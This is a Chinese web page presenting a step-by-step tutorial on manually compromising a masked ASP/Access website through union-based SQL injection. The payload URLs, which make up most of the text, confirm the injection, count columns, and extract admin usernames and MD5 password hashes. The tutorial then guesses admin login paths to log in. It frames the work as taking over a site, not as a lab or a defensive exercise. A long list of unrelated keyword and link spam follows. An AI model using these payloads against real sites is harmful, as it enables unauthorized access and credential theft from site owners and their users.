【实战】利用联合查询--手工SQL注入拿下网站
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。目标网址:http://www.******.com/about.a
千家信息网最后更新 2025年02月01日【实战】利用联合查询--手工SQL注入拿下网站
看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。
目标网址:http://www.******.com/about.asp?id=1
1.首先确认这里是否存在整型注入,很简单,url后加' and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。
2.利用order by判断表项有几个;
http://www.******.com/about.asp?id=1 order by 4(这里的5报错,4正确,就是4个了)
3.然后测试显示位,2,3位可显;
http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin
4.在显示位猜测字段值;这里的表名,字段名根据经验来试;常见的就那几种;我们得到了用户名和密码(MD5加密的);
http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin
5.拿到用户名密码后,寻找后台,常见的admin/login/manager/admin_login等可以试一试,成功登陆,搞定。提权后面再说咯。
后台
字段
密码
小子
常见
用户
用户名
手工
网站
重要
成功
同时
基础
就是
工具
数据
数据库
目标
穿山甲
站点
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
合肥凯梁网络技术有限公司
前端在软件开发中的地位
电商的实现其涉及网络技术
丽水企业软件开发工程师
1802网络安全电力
mysql用ip访问数据库
阿里云搭建方舟服务器
上海瀚途网络技术
一个数据库可以有多张表
宝山区大型软件开发采购信息
我的世界 极限生存服务器
桑珠孜区网络安全宣传
服务器查询不到ip
封闭式基金折价率 数据库
类似牧牛云的服务器
网络技术下的孤独人类
iop 数据库
java直接编码连接数据库
lunarpages服务器
斗罗大陆斗罗服服务器通讯异常
服务器坏了一块硬盘
工业控制网络技术工资
网络技术方面的专业技能
教你如何保护你的家庭网络安全
c语言和网络技术能同时报名吗
湖南铁路计算机网络技术好吗
湖南宏工软件开发
洛克王国打不开服务器
2020年怀旧服服务器推荐
江苏省公安厅网络安全